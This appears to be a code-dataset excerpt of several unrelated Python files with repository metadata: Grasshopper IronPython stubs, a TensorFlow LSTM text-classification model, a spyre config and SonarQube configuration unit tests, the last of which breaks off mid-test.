    Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Bounds(self: GH_EquationFragment) -> RectangleF
"""
    Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Description(self: GH_EquationFragment) -> str
"""
    Icon=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Icon(self: GH_EquationFragment) -> Bitmap
"""
    Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Name(self: GH_EquationFragment) -> str
"""
    Pivot=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Pivot(self: GH_EquationFragment) -> PointF
Set: Pivot(self: GH_EquationFragment)=value
"""
    Size=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Size(self: GH_EquationFragment) -> SizeF
"""
    # Internal backing fields emitted by the stub generator.
    m_pivot=None
    m_size=None
# Auto-generated IronPython stub for
# Grasshopper.GUI.Equations.GH_SequenceFragment (an equation fragment
# composed of a sequence of child fragments); bodies are placeholders.
class GH_SequenceFragment(GH_EquationFragment,IGH_EquationFragment):
    """ GH_SequenceFragment() """
    def Layout(self,font):
        """ Layout(self: GH_SequenceFragment,font: Font) -> bool """
        pass
    def Position(self,location):
        """ Position(self: GH_SequenceFragment,location: PointF) -> bool """
        pass
    def Render(self,graphics,font,colour):
        """ Render(self: GH_SequenceFragment,graphics: Graphics,font: Font,colour: Color) """
        pass
    def ToExpression(self):
        """ ToExpression(self: GH_SequenceFragment) -> str """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stubbed .NET properties with generator-emitted type-annotation strings.
    Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Description(self: GH_SequenceFragment) -> str
"""
    Fragments=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Fragments(self: GH_SequenceFragment) -> List[IGH_EquationFragment]
"""
    Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Name(self: GH_SequenceFragment) -> str
"""
    # Internal backing fields emitted by the stub generator.
    m_pivot=None
    m_size=None
# Auto-generated IronPython stub for
# Grasshopper.GUI.Equations.GH_TextFragment (an equation fragment that
# holds plain text); bodies are placeholders.
class GH_TextFragment(GH_EquationFragment,IGH_EquationFragment):
    """ GH_TextFragment() """
    def Layout(self,font):
        """ Layout(self: GH_TextFragment,font: Font) -> bool """
        pass
    def Position(self,location):
        """ Position(self: GH_TextFragment,location: PointF) -> bool """
        pass
    def Render(self,graphics,font,colour):
        """ Render(self: GH_TextFragment,graphics: Graphics,font: Font,colour: Color) """
        pass
    def ToExpression(self):
        """ ToExpression(self: GH_TextFragment) -> str """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stubbed .NET properties with generator-emitted type-annotation strings.
    Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Description(self: GH_TextFragment) -> str
"""
    Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Name(self: GH_TextFragment) -> str
"""
    Text=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Text(self: GH_TextFragment) -> str
Set: Text(self: GH_TextFragment)=value
"""
    # Internal backing fields emitted by the stub generator.
    m_pivot=None
    m_size=None
# Auto-generated IronPython stub for the interface
# Grasshopper.GUI.Equations.IGH_EquationFragment; method bodies are
# placeholders describing the .NET signatures only.
class IGH_EquationFragment:
    # no doc
    def Layout(self,font):
        """ Layout(self: IGH_EquationFragment,font: Font) -> bool """
        pass
    def Position(self,location):
        """ Position(self: IGH_EquationFragment,location: PointF) -> bool """
        pass
    def Render(self,graphics,font,colour):
        """ Render(self: IGH_EquationFragment,graphics: Graphics,font: Font,colour: Color) """
        pass
    def ToExpression(self):
        """ ToExpression(self: IGH_EquationFragment) -> str """
        pass
    def __init__(self,*args):
        """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
        pass
    # Stubbed .NET properties with generator-emitted type-annotation strings.
    Bounds=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Bounds(self: IGH_EquationFragment) -> RectangleF
"""
    Description=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Description(self: IGH_EquationFragment) -> str
"""
    Icon=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Icon(self: IGH_EquationFragment) -> Bitmap
"""
    Name=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Name(self: IGH_EquationFragment) -> str
"""
    Pivot=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Pivot(self: IGH_EquationFragment) -> PointF
Set: Pivot(self: IGH_EquationFragment)=value
"""
    Size=property(lambda self: object(),lambda self,v: None,lambda self: None)
    """Get: Size(self: IGH_EquationFragment) -> SizeF
"""
| 26.91342
| 215
| 0.68554
| 760
| 6,217
| 5.330263
| 0.107895
| 0.1333
| 0.07998
| 0.10664
| 0.823254
| 0.787213
| 0.787213
| 0.766477
| 0.753641
| 0.753641
| 0
| 0.003466
| 0.16471
| 6,217
| 230
| 216
| 27.030435
| 0.776622
| 0.330224
| 0
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.3
| 0
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
98287a4c73b8f74706180614b411ec7615a72701
| 10,533
|
py
|
Python
|
DLScripts/article_quality/lstm_model.py
|
StanleyLeiSun/PlayGround
|
e8774ef41043e88cc64fc1eacbf0edd99a40ba35
|
[
"Apache-2.0"
] | 1
|
2018-08-12T11:40:28.000Z
|
2018-08-12T11:40:28.000Z
|
DLScripts/article_quality/lstm_model.py
|
StanleyLeiSun/PlayGround
|
e8774ef41043e88cc64fc1eacbf0edd99a40ba35
|
[
"Apache-2.0"
] | 4
|
2021-03-18T20:30:11.000Z
|
2022-03-11T23:19:54.000Z
|
DLScripts/article_quality/lstm_model.py
|
StanleyLeiSun/PlayGround
|
e8774ef41043e88cc64fc1eacbf0edd99a40ba35
|
[
"Apache-2.0"
] | null | null | null |
import tensorflow as tf
import numpy as np
import lstm_config
def get_model(config, is_training=True):
    """Build and return the category RNN model for the given config.

    Parameters
    ----------
    config : object
        Hyper-parameter container consumed by ``RNN_Model_Category``.
    is_training : bool
        Forwarded to the model; when False the constructor skips the
        training-only graph ops.
    """
    model = RNN_Model_Category(config, is_training)
    return model
class RNN_Model_Category(object):
    """LSTM text classifier built with the TensorFlow 1.x graph API.

    Graph: embedding lookup -> (optional dropout) -> stacked LSTM unrolled
    over ``num_step`` -> mask-weighted mean pooling over time -> softmax
    over ``class_num`` classes.  When ``is_training`` is True, gradient
    clipping, SGD training ops and summaries are also built.
    """
    def __init__(self,config,is_training=True):
        # Inputs: token-id matrix [batch, num_step], integer class labels
        # [batch], and a float mask [num_step, batch] used as per-timestep
        # weights in the pooling step.
        self.keep_prob=config.keep_prob
        self.batch_size=tf.Variable(0,dtype=tf.int32,trainable=False)
        num_step=config.num_step
        self.input_data=tf.placeholder(tf.int32,[None,num_step])
        self.target = tf.placeholder(tf.int64,[None])
        self.mask_x = tf.placeholder(tf.float32,[num_step,None])
        class_num=config.class_num
        hidden_neural_size=config.hidden_neural_size
        vocabulary_size=config.vocabulary_size
        embed_dim=config.embed_dim
        hidden_layer_num=config.hidden_layer_num
        self.new_batch_size = tf.placeholder(tf.int32,shape=[],name="new_batch_size")
        #op to update batch size
        self._batch_size_update = tf.assign(self.batch_size,self.new_batch_size)
        #build LSTM network
        lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size,forget_bias=0.0,state_is_tuple=True)
        if self.keep_prob<1:
            lstm_cell = tf.nn.rnn_cell.DropoutWrapper(
                lstm_cell,output_keep_prob=self.keep_prob
            )
        cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell]*hidden_layer_num,state_is_tuple=True)
        #self._initial_state = cell.zero_state(self.batch_size,dtype=tf.float32)
        # NOTE(review): the batch size is hard-coded to 640 here even though
        # a dynamic self.batch_size variable exists (see commented line
        # above) — graphs built this way only accept batches of exactly 640.
        self._initial_state = cell.zero_state(640,dtype=tf.float32)
        #embedding layer
        with tf.device(lstm_config.training_device),tf.name_scope("embedding_layer"):
            embedding = tf.get_variable("embedding",[vocabulary_size,embed_dim],dtype=tf.float32)
            inputs=tf.nn.embedding_lookup(embedding,self.input_data)
        if self.keep_prob<1:
            inputs = tf.nn.dropout(inputs,self.keep_prob)
        out_put=[]
        state=self._initial_state
        # Manually unrolled LSTM over the time dimension; variables are
        # reused across timesteps.
        with tf.variable_scope("LSTM_layer"):
            for time_step in range(num_step):
                if time_step>0: tf.get_variable_scope().reuse_variables()
                (cell_output,state)=cell(inputs[:,time_step,:],state)
                out_put.append(cell_output)
        # Weight each timestep's output by the mask, then average:
        # sum_t(out*mask) / sum_t(mask).
        out_put=out_put*self.mask_x[:,:,None]
        with tf.name_scope("mean_pooling_layer"):
            out_put=tf.reduce_sum(out_put,0)/(tf.reduce_sum(self.mask_x,0)[:,None])
        with tf.name_scope("Softmax_layer_and_output"):
            softmax_w = tf.get_variable("softmax_w",[hidden_neural_size,class_num],dtype=tf.float32)
            softmax_b = tf.get_variable("softmax_b",[class_num],dtype=tf.float32)
            self.logits = tf.matmul(out_put,softmax_w)+softmax_b
        with tf.name_scope("loss"):
            self.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.logits+1e-10,labels = self.target)#??
            #self.loss = tf.nn.sparse_softmax_cross_entropy_with_logits(logits = self.target,labels = self.target)#??
            self.cost = tf.reduce_mean(self.loss)
        with tf.name_scope("accuracy"):
            self.prediction = tf.argmax(self.logits,1)
            correct_prediction = tf.equal(self.prediction,self.target)
            self.correct_num=tf.reduce_sum(tf.cast(correct_prediction,tf.float32))
            self.accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32),name="accuracy")
        #add summary
        loss_summary = tf.summary.scalar("loss",self.cost)
        #add summary
        accuracy_summary=tf.summary.scalar("accuracy_summary",self.accuracy)
        # Inference-only graphs stop here; everything below is training-only.
        if not is_training:
            return
        self.globle_step = tf.Variable(0,name="globle_step",trainable=False)
        self.lr = tf.Variable(0.0,trainable=False)
        tvars = tf.trainable_variables()
        # Global-norm gradient clipping before applying SGD updates.
        grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars),
                                          config.max_grad_norm)
        # Keep track of gradient values and sparsity (optional)
        grad_summaries = []
        for g, v in zip(grads, tvars):
            if g is not None:
                grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(v.name), g)
                sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
                grad_summaries.append(grad_hist_summary)
                grad_summaries.append(sparsity_summary)
        self.grad_summaries_merged = tf.summary.merge(grad_summaries)
        self.summary =tf.summary.merge([loss_summary,accuracy_summary,self.grad_summaries_merged])
        optimizer = tf.train.GradientDescentOptimizer(self.lr)
        # NOTE(review): apply_gradients is called twice; the first call's
        # op is never used and just adds a duplicate update op to the graph.
        optimizer.apply_gradients(zip(grads, tvars))
        self.train_op=optimizer.apply_gradients(zip(grads, tvars))
        self.new_lr = tf.placeholder(tf.float32,shape=[],name="new_learning_rate")
        self._lr_update = tf.assign(self.lr,self.new_lr)

    def assign_new_lr(self,session,lr_value):
        # Push a new learning-rate value into the graph variable.
        session.run(self._lr_update,feed_dict={self.new_lr:lr_value})

    def assign_new_batch_size(self,session,batch_size_value):
        # Push a new batch-size value into the graph variable.
        session.run(self._batch_size_update,feed_dict={self.new_batch_size:batch_size_value})
class RNN_Model_Regression(object):
    """LSTM regressor built with the TensorFlow 1.x graph API.

    Same backbone as RNN_Model_Category (embedding -> stacked LSTM ->
    masked mean pooling) but with a single linear output unit, mean
    absolute error as the loss, and "accuracy" defined as the fraction
    of predictions within 0.08 of the target.
    """
    def __init__(self,config,is_training=True):
        # Inputs: token-id matrix [batch, num_step], float regression
        # targets [batch], and a float mask [num_step, batch] used as
        # per-timestep weights in the pooling step.
        self.keep_prob=config.keep_prob
        self.batch_size=tf.Variable(0,dtype=tf.int32,trainable=False)
        num_step=config.num_step
        self.input_data=tf.placeholder(tf.int32,[None,num_step])
        self.target = tf.placeholder(tf.float32,[None])
        self.mask_x = tf.placeholder(tf.float32,[num_step,None])
        hidden_neural_size=config.hidden_neural_size
        # NOTE: the vocabulary size comes from a differently named config
        # field here (token_vacabulary_size) than in the category model.
        vocabulary_size=config.token_vacabulary_size
        embed_dim=config.embed_dim
        hidden_layer_num=config.hidden_layer_num
        self.new_batch_size = tf.placeholder(tf.int32,shape=[],name="new_batch_size")
        #op to update batch size
        self._batch_size_update = tf.assign(self.batch_size,self.new_batch_size)
        #build LSTM network
        lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_neural_size,forget_bias=0.0,state_is_tuple=True)
        if self.keep_prob<1:
            lstm_cell = tf.nn.rnn_cell.DropoutWrapper(
                lstm_cell,output_keep_prob=self.keep_prob
            )
        cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell]*hidden_layer_num,state_is_tuple=True)
        #self._initial_state = cell.zero_state(self.batch_size,dtype=tf.float32)
        # NOTE(review): batch size hard-coded to 640, same caveat as in
        # RNN_Model_Category.
        self._initial_state = cell.zero_state(640,dtype=tf.float32)
        #embedding layer
        with tf.device(lstm_config.training_device),tf.name_scope("embedding_layer"):
            embedding = tf.get_variable("embedding",[vocabulary_size,embed_dim],dtype=tf.float32)
            inputs=tf.nn.embedding_lookup(embedding,self.input_data)
        if self.keep_prob<1:
            inputs = tf.nn.dropout(inputs,self.keep_prob)
        out_put=[]
        state=self._initial_state
        # Manually unrolled LSTM over the time dimension; variables are
        # reused across timesteps.
        with tf.variable_scope("LSTM_layer"):
            for time_step in range(num_step):
                if time_step>0: tf.get_variable_scope().reuse_variables()
                (cell_output,state)=cell(inputs[:,time_step,:],state)
                out_put.append(cell_output)
        # Weight each timestep's output by the mask, then average:
        # sum_t(out*mask) / sum_t(mask).
        out_put=out_put*self.mask_x[:,:,None]
        #print(out_put)
        #print(self.mask_x)
        with tf.name_scope("mean_pooling_layer"):
            out_put=tf.reduce_sum(out_put,0)/(tf.reduce_sum(self.mask_x,0)[:,None])
        #print(out_put)
        with tf.name_scope("Softmax_layer_and_output"):
            # Single linear output unit for the regression score.
            softmax_w = tf.get_variable("softmax_w",[hidden_neural_size,1],dtype=tf.float32)
            softmax_b = tf.get_variable("softmax_b",[1], dtype=tf.float32)
            #softmax_w = tf.get_variable("softmax_w",[1,hidden_neural_size],dtype=tf.float32)
            self.logits = tf.matmul(out_put,softmax_w) + softmax_b
            self.logits = tf.reshape(self.logits,[-1])
        #print(self.logits)
        with tf.name_scope("loss"):
            # Mean absolute error (the squared-error variant is kept
            # commented out below).
            #self.lost = tf.reduce_mean(tf.square(self.logits+1e-10 - self.target))
            self.lost = tf.reduce_mean(tf.abs(self.logits+1e-10 - self.target))
            self.cost = self.lost
        with tf.name_scope("accuracy"):
            #self.prediction = tf.argmax(self.logits+1e-10, 0.0)
            prediction = self.logits
            # A prediction counts as "correct" when within 0.08 of target.
            correct_prediction = tf.less_equal(tf.abs(prediction - self.target), 0.08)
            self.correct_item = tf.cast(correct_prediction,tf.float32)
            self.correct_num=tf.reduce_sum(tf.cast(correct_prediction,tf.float32))
            self.accuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32),name="accuracy")
        #print(self.target)
        #print(self.correct_prediction)
        #add summary
        loss_summary = tf.summary.scalar("loss",self.cost)
        #add summary
        accuracy_summary=tf.summary.scalar("accuracy_summary",self.accuracy)
        # Inference-only graphs stop here; everything below is training-only.
        if not is_training:
            return
        self.globle_step = tf.Variable(0,name="globle_step",trainable=False)
        self.lr = tf.Variable(0.0,trainable=False)
        tvars = tf.trainable_variables()
        # Global-norm gradient clipping before applying SGD updates.
        grads, _ = tf.clip_by_global_norm(tf.gradients(self.cost, tvars),
                                          config.max_grad_norm)
        # Keep track of gradient values and sparsity (optional)
        grad_summaries = []
        for g, v in zip(grads, tvars):
            if g is not None:
                grad_hist_summary = tf.summary.histogram("{}/grad/hist".format(v.name), g)
                sparsity_summary = tf.summary.scalar("{}/grad/sparsity".format(v.name), tf.nn.zero_fraction(g))
                grad_summaries.append(grad_hist_summary)
                grad_summaries.append(sparsity_summary)
        self.grad_summaries_merged = tf.summary.merge(grad_summaries)
        self.summary =tf.summary.merge([loss_summary,accuracy_summary,self.grad_summaries_merged])
        optimizer = tf.train.GradientDescentOptimizer(self.lr)
        # NOTE(review): apply_gradients is called twice; the first call's
        # op is never used and just adds a duplicate update op to the graph.
        optimizer.apply_gradients(zip(grads, tvars))
        self.train_op=optimizer.apply_gradients(zip(grads, tvars))
        self.new_lr = tf.placeholder(tf.float32,shape=[],name="new_learning_rate")
        self._lr_update = tf.assign(self.lr,self.new_lr)

    def assign_new_lr(self,session,lr_value):
        # Push a new learning-rate value into the graph variable.
        session.run(self._lr_update,feed_dict={self.new_lr:lr_value})

    def assign_new_batch_size(self,session,batch_size_value):
        # Push a new batch-size value into the graph variable.
        session.run(self._batch_size_update,feed_dict={self.new_batch_size:batch_size_value})
| 42.132
| 122
| 0.669135
| 1,448
| 10,533
| 4.587017
| 0.11395
| 0.03523
| 0.023186
| 0.018067
| 0.909515
| 0.904095
| 0.892352
| 0.874737
| 0.874737
| 0.874737
| 0
| 0.012833
| 0.215798
| 10,533
| 249
| 123
| 42.301205
| 0.791283
| 0.07823
| 0
| 0.822785
| 0
| 0
| 0.042136
| 0.004957
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044304
| false
| 0
| 0.018987
| 0.006329
| 0.094937
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
983b55009d3640bb635c7f0524ac92850b245336
| 45
|
py
|
Python
|
final_project/machinetranslation/__init__.py
|
ankur1198/xzceb-flask_eng_fr
|
d64c99522968e2d6536d6c6ceeef56f6a21090ec
|
[
"Apache-2.0"
] | null | null | null |
final_project/machinetranslation/__init__.py
|
ankur1198/xzceb-flask_eng_fr
|
d64c99522968e2d6536d6c6ceeef56f6a21090ec
|
[
"Apache-2.0"
] | null | null | null |
final_project/machinetranslation/__init__.py
|
ankur1198/xzceb-flask_eng_fr
|
d64c99522968e2d6536d6c6ceeef56f6a21090ec
|
[
"Apache-2.0"
] | null | null | null |
#from . import tests
from . import translator
| 22.5
| 24
| 0.777778
| 6
| 45
| 5.833333
| 0.666667
| 0.571429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 24
| 22.5
| 0.921053
| 0.422222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9865a0f7c14b8f9a402c237beb116ada85d0f407
| 394
|
py
|
Python
|
spyre/testing/align2.py
|
zhong-lab/optics
|
9de1942d9a128183ecb3d360b160b27126e7b8f0
|
[
"BSD-2-Clause"
] | null | null | null |
spyre/testing/align2.py
|
zhong-lab/optics
|
9de1942d9a128183ecb3d360b160b27126e7b8f0
|
[
"BSD-2-Clause"
] | null | null | null |
spyre/testing/align2.py
|
zhong-lab/optics
|
9de1942d9a128183ecb3d360b160b27126e7b8f0
|
[
"BSD-2-Clause"
] | null | null | null |
# Spyre configuration for the alignment experiment.
# Fix: the file contained an unresolved git merge conflict
# (<<<<<<< / ======= / >>>>>>> markers), which is a syntax error.
# Both sides of the conflict were identical, so it resolves to one copy.

# Device List
devices = {
}

# Experiment List
spyrelets = {
    'align': [
        'spyre.spyrelets.align2_spyreley.ALIGNMENT',
        {},
        {}
    ],
}
| 13.133333
| 52
| 0.532995
| 26
| 394
| 8
| 0.461538
| 0.096154
| 0.163462
| 0.259615
| 0.788462
| 0.788462
| 0.788462
| 0.788462
| 0.788462
| 0.788462
| 0
| 0.106762
| 0.286802
| 394
| 29
| 53
| 13.586207
| 0.633452
| 0.139594
| 0
| 0.666667
| 0
| 0
| 0.275449
| 0.245509
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9880b8ee8cbf2c26d4251556714fda9dd02f2df6
| 8,236
|
py
|
Python
|
sonarqube/tests/test_unit.py
|
mchelen-gov/integrations-core
|
81281600b3cc7025a7a32148c59620c9592a564f
|
[
"BSD-3-Clause"
] | 663
|
2016-08-23T05:23:45.000Z
|
2022-03-29T00:37:23.000Z
|
sonarqube/tests/test_unit.py
|
mchelen-gov/integrations-core
|
81281600b3cc7025a7a32148c59620c9592a564f
|
[
"BSD-3-Clause"
] | 6,642
|
2016-06-09T16:29:20.000Z
|
2022-03-31T22:24:09.000Z
|
sonarqube/tests/test_unit.py
|
mchelen-gov/integrations-core
|
81281600b3cc7025a7a32148c59620c9592a564f
|
[
"BSD-3-Clause"
] | 1,222
|
2017-01-27T15:51:38.000Z
|
2022-03-31T18:17:51.000Z
|
# (C) Datadog, Inc. 2020-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import pytest
from datadog_checks.base import ConfigurationError
pytestmark = [pytest.mark.unit]
class TestParseConfig:
    """Validation errors raised by parse_config for malformed settings."""

    def test_components_not_mapping(self, sonarqube_check):
        """A non-mapping `components` value is rejected."""
        sq_check = sonarqube_check({'components': 'foo'})
        with pytest.raises(ConfigurationError, match='The `components` setting must be a mapping'):
            sq_check.parse_config()

    def test_components_not_defined(self, sonarqube_check):
        """A missing `components` setting is rejected."""
        sq_check = sonarqube_check({})
        with pytest.raises(ConfigurationError, match='The `components` setting must be defined'):
            sq_check.parse_config()

    def test_components_empty(self, sonarqube_check):
        """An empty `components` mapping is rejected."""
        sq_check = sonarqube_check({'components': {}})
        with pytest.raises(ConfigurationError, match='The `components` setting must be defined'):
            sq_check.parse_config()

    def test_default_tag_not_string(self, sonarqube_check):
        """A non-string `default_tag` value is rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_tag': 9000})
        with pytest.raises(ConfigurationError, match='The `default_tag` setting must be a string'):
            sq_check.parse_config()

    def test_component_not_mapping(self, sonarqube_check):
        """A component entry that is not a mapping is rejected."""
        sq_check = sonarqube_check({'components': {'foo': 'bar'}})
        with pytest.raises(ConfigurationError, match='Component `foo` must refer to a mapping'):
            sq_check.parse_config()

    def test_tag_not_string(self, sonarqube_check):
        """A non-string per-component `tag` value is rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'tag': 9000}}})
        with pytest.raises(ConfigurationError, match='The `tag` setting must be a string'):
            sq_check.parse_config()
class TestPatternCompilation:
    """Validation of include/exclude pattern settings during parse_config."""

    def test_default_include_not_array(self, sonarqube_check):
        """A non-array `default_include` is rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_include': 'foo'})
        with pytest.raises(ConfigurationError, match='The `default_include` setting must be an array'):
            sq_check.parse_config()

    def test_default_include_pattern_not_string(self, sonarqube_check):
        """Non-string patterns in `default_include` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_include': [9000]})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `default_include` setting must be a string'):
            sq_check.parse_config()

    def test_default_include_pattern_too_broad(self, sonarqube_check):
        """Overly broad patterns in `default_include` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_include': ['sonarqube']})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `default_include` setting must be more specific'):
            sq_check.parse_config()

    def test_default_exclude_not_array(self, sonarqube_check):
        """A non-array `default_exclude` is rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_exclude': 'foo'})
        with pytest.raises(ConfigurationError, match='The `default_exclude` setting must be an array'):
            sq_check.parse_config()

    def test_default_exclude_pattern_not_string(self, sonarqube_check):
        """Non-string patterns in `default_exclude` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_exclude': [9000]})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `default_exclude` setting must be a string'):
            sq_check.parse_config()

    def test_default_exclude_pattern_too_broad(self, sonarqube_check):
        """Overly broad patterns in `default_exclude` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_exclude': ['sonarqube']})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `default_exclude` setting must be more specific'):
            sq_check.parse_config()

    def test_include_not_array(self, sonarqube_check):
        """A non-array per-component `include` is rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'include': 'foo'}}})
        with pytest.raises(ConfigurationError, match='The `include` setting must be an array'):
            sq_check.parse_config()

    def test_include_pattern_not_string(self, sonarqube_check):
        """Non-string patterns in per-component `include` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'include': [9000]}}})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `include` setting must be a string'):
            sq_check.parse_config()

    def test_include_pattern_too_broad(self, sonarqube_check):
        """Overly broad patterns in per-component `include` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'include': ['sonarqube']}}})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `include` setting must be more specific'):
            sq_check.parse_config()

    def test_exclude_not_array(self, sonarqube_check):
        """A non-array per-component `exclude` is rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'exclude': 'foo'}}})
        with pytest.raises(ConfigurationError, match='The `exclude` setting must be an array'):
            sq_check.parse_config()

    def test_exclude_pattern_not_string(self, sonarqube_check):
        """Non-string patterns in per-component `exclude` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'exclude': [9000]}}})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `exclude` setting must be a string'):
            sq_check.parse_config()

    def test_exclude_pattern_too_broad(self, sonarqube_check):
        """Overly broad patterns in per-component `exclude` are rejected."""
        sq_check = sonarqube_check({'components': {'foo': {'exclude': ['sonarqube']}}})
        with pytest.raises(ConfigurationError, match='Pattern #1 in `exclude` setting must be more specific'):
            sq_check.parse_config()
class TestComponentData:
    """Shape of the parsed component data: tags and metric selectors."""

    def test_data_is_present(self, sonarqube_check):
        """Every configured component gets an entry in _components."""
        sq_check = sonarqube_check({'components': {'foo': {}, 'bar': {}}})
        sq_check.parse_config()
        assert len(sq_check._components) == 2
        assert 'foo' in sq_check._components
        assert 'bar' in sq_check._components

    def test_default_default_tag(self, sonarqube_check):
        """Without configuration the tag name defaults to 'component'."""
        sq_check = sonarqube_check({'components': {'foo': {}}})
        sq_check.parse_config()
        tag, _ = sq_check._components['foo']
        assert tag == 'component'

    def test_default_tag(self, sonarqube_check):
        """`default_tag` overrides the default tag name."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_tag': 'project'})
        sq_check.parse_config()
        tag, _ = sq_check._components['foo']
        assert tag == 'project'

    def test_tag_override(self, sonarqube_check):
        """A per-component `tag` overrides `default_tag`."""
        sq_check = sonarqube_check({'components': {'foo': {'tag': 'bar'}}, 'default_tag': 'project'})
        sq_check.parse_config()
        tag, _ = sq_check._components['foo']
        assert tag == 'bar'

    def test_selector_accept_everything_by_default(self, sonarqube_check):
        """Without include/exclude patterns, the selector accepts anything."""
        sq_check = sonarqube_check({'components': {'foo': {}}})
        sq_check.parse_config()
        _, select = sq_check._components['foo']
        assert select('asdf')

    def test_selector_default_include(self, sonarqube_check):
        """`default_include` restricts which metrics are selected."""
        sq_check = sonarqube_check({'components': {'foo': {}}, 'default_include': ['foo.']})
        sq_check.parse_config()
        _, select = sq_check._components['foo']
        assert select('foo.bar')
        assert not select('bar.baz')

    def test_selector_include_override(self, sonarqube_check):
        """A per-component `include` replaces `default_include`."""
        sq_check = sonarqube_check({'components': {'foo': {'include': ['bar.']}}, 'default_include': ['foo.']})
        sq_check.parse_config()
        _, select = sq_check._components['foo']
        assert not select('foo.bar')
        assert select('bar.baz')

    def test_selector_default_exclude_override(self, sonarqube_check):
        """`default_exclude` wins over an include match."""
        sq_check = sonarqube_check({'components': {'foo': {'include': ['foo.']}}, 'default_exclude': ['foo.bar']})
        sq_check.parse_config()
        _, select = sq_check._components['foo']
        assert not select('foo.bar')
        assert select('foo.baz')

    def test_selector_exclude_override(self, sonarqube_check):
        """A per-component `exclude` replaces `default_exclude`."""
        sq_check = sonarqube_check(
